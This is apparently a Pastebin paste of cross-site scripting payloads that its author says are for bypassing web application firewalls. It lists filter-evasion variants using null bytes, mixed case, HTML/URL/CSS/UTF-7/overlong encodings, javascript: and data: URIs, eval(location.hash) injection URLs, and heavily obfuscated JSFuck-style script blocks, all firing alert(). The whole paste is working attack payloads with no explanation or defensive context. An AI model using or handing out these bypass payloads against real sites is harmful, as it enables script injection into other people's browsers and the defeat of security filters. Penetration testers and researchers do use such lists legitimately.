API tools faq
paste
moemyintshein

Cross-site-scripting-payload-fuzzing

moemyintshein
Mar 21st, 2017
137
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.80 KB | None | 0 0
raw download clone embed print report
  1. Collected some of the more useful XSS payload, used to bypass the waf and some applications:
  2.  
  3. <sCrIpt>alert(1)</ScRipt>
  4.  
  5. \<iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>
  6.  
  7. <img src=’1′ onerror\x00=alert(0) />
  8.  
  9. <img src=’1′ onerror/=alert(0) />
  10.  
  11. <img src=’1′ onerror\x0b=alert(0) />
  12.  
  13. <img src=’1′ onerror=\x00alert(0) />
  14.  
  15. <\x00img src=’1′ onerror=alert(0) />
  16.  
  17. <script\x00>alert(1)</script>
  18.  
  19. <i\x00mg src=’1′ onerror=alert(0) />
  20.  
  21. <img/src=’1’/onerror=alert(0)>
  22.  
  23. <img\x0bsrc=’1’\x0bonerror=alert(0)>
  24.  
  25. <img src=’1”onerror=’alert(0)’>
  26. <img src=’1′”onerror=”alert(0)”>
  27.  
  28. <img src=’1’\x00onerror=alert(0)>
  29.  
  30. <img src=’1’onerror=alert(0)>
  31. Firefox (\x09, \x0a, \x0d, \x20)
  32. Chrome (Any character \x01 to \x20)
  33. <iframe src=”\x01javascript:alert(0)”></iframe> <!– Example for Chrome –>
  34.  
  35. <img src=’1′ onerror=’alert(0)’ <
  36.  
  37. <<script>alert(0)</script>
  38.  
  39. <style>body{background-color:expression\(alert(1))}</style>
  40.  
  41. <script>document.write(‘<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>’);</script>
  42.  
  43. HTML Encoding
  44. <img src=”1″ onerror=”alert(1)” />
  45. <img src=”1″ onerror=”&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;” />
  46. <iframe src=”javascript:alert(1)”></iframe>
  47. <iframe src=”&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;”></iframe>
  48.  
  49. URL Encoding
  50. <iframe src=”javascript:alert(1)”></iframe>
  51. <iframe src=”javascript:%61%6c%65%72%74%28%31%29″></iframe>
  52.  
  53. CSS Hexadecimal Encoding
  54. <div style=”x:expression(alert(1))”>Joker</div>
  55. <div style=”x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))”>Joker</div>
  56. <div style=”x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))”>Joker</div>
  57. <div style=”x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029″>Joker</div>
  58.  
  59. JavaScript
  60. <script>document.write(‘<img src=1 onerror=alert(1)>’);</script>
  61. <script>document.write(‘\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E’);</script>
  62. <script>document.write(‘\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076’);</script>
  63. <script>document.write(‘\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E’);</script>
  64.  
  65. JavaScript
  66. <script>document.write(‘<img src=1 onerror=alert(1)>’);</script>
  67. <script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>
  68.  
  69. JavaScript
  70. <script>alert(123)</script>
  71. <script>\u0061\u006C\u0065\u0072\u0074(123)</script>
  72.  
  73. Overlong UTF-8
  74. < = %C0%BC = %E0%80%BC = %F0%80%80%BC
  75. > = %C0%BE = %E0%80%BE = %F0%80%80%BE
  76. ‘ = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
  77. ” = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
  78.  
  79. <img src=”1″ onnerror=”alert(1)”>
  80. %E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
  81.  
  82. UTF-7 (Missing charset?)
  83. <img src=”1″ onerror=”alert(1)” />
  84. +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
  85.  
  86. Unicode .NET Ugliness
  87. <script>alert(1)</script>
  88. %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
  89.  
  90. Classic ASP
  91. <img src=”1″ onerror=”alert(‘1’)”>
  92. %u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A
  93.  
  94. and/or Useful features.
  95. HTML 5 (Not comphrensive)
  96. <video src=”http://www.w3schools.com/html5/movie.ogg” onloadedmetadata=”alert(1)” />
  97. <video src=”http://www.w3schools.com/html5/movie.ogg” onloadstart=”alert(1)” />
  98.  
  99. Usuage of non-existent elements
  100. <blah style=”blah:expression(alert(1))” />
  101.  
  102. CSS Comments
  103. <div style=”z:exp/*anything*/res/*here*/sion(alert(1))” />
  104.  
  105. JavaScript functions
  106. <script>window[‘alert’](0)</script>
  107. <script>parent[‘alert’](1)</script>
  108. <script>self[‘alert’](2)</script>
  109. <script>top[‘alert’](3)</script>
  110.  
  111. JavaScript into HTML
  112. <img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
  113.  
  114. <script>
  115. var junk = ‘</script><script>alert(1)</script>’;
  116. </script>
  117.  
  118. HTML CSS
  119. <style>
  120. body { background-image:url(‘http://www.blah.com/</style><script>alert(1)</script>’); }
  121. </style>
  122.  
  123. XML documents
  124. <?xml version=”1.0″ ?>
  125. <someElement>
  126. <a xmlns:a=’http://www.w3.org/1999/xhtml’><a:body onload=’alert(1)’/></a>
  127. </someElement>
  128.  
  129. URI Schemes
  130. <iframe src=”javascript:alert(1)”></iframe>
  131. <iframe src=”vbscript:msgbox(1)”></iframe> (IE)
  132. <iframe src=”data:text/html,<script>alert(0)</script>”></iframe> (Firefox, Chrome, Safari)
  133. <iframe src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></iframe> (Firefox, Chrome, Safari)
  134.  
  135. HTTP Parameter Pollution
  136. http://target.com/something.xxx?a=val1&a=val2
  137. ASP.NET a = val1,val2
  138. ASP a = val1,val2
  139. JSP a = val1
  140. PHP a = val2
  141.  
  142. <script>eval(location.hash.slice(1))</script>
  143. <script>eval(location.hash)</script> (Firefox)
  144.  
  145. http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)
  146. <iframe src=”http://target.com/something.jsp?inject=<script>eval(name)</script>” name=”alert(1)”></iframe>
  147.  
  148. <script>
  149. $=~[];$={___:++$,$$$$:(![]+””)[$],__$:++$,$_$_:(![]+””)[$],_$_:++$,$_$$:({}+””)[$],$$_$:($[$]+””)[$],_$$:++$,$$$_:(!””+””)[$],$__:++$,$_$:++$,$$__:({}+””)[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+””)[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+””)[$.__$])+((!$)+””)[$._$$]+($.__=$.$_[$.$$_])+($.$=(!””+””)[$.__$])+($._=(!””+””)[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!””+””)[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+”\””+$.$_$_+(![]+””)[$._$_]+$.$$$_+”\\”+$.__$+$.$$_+$._$_+$.__+”(“+$.___+”)”+”\””)())();
  150. </script>
  151.  
  152. <script>
  153. (+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
  154. </script>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!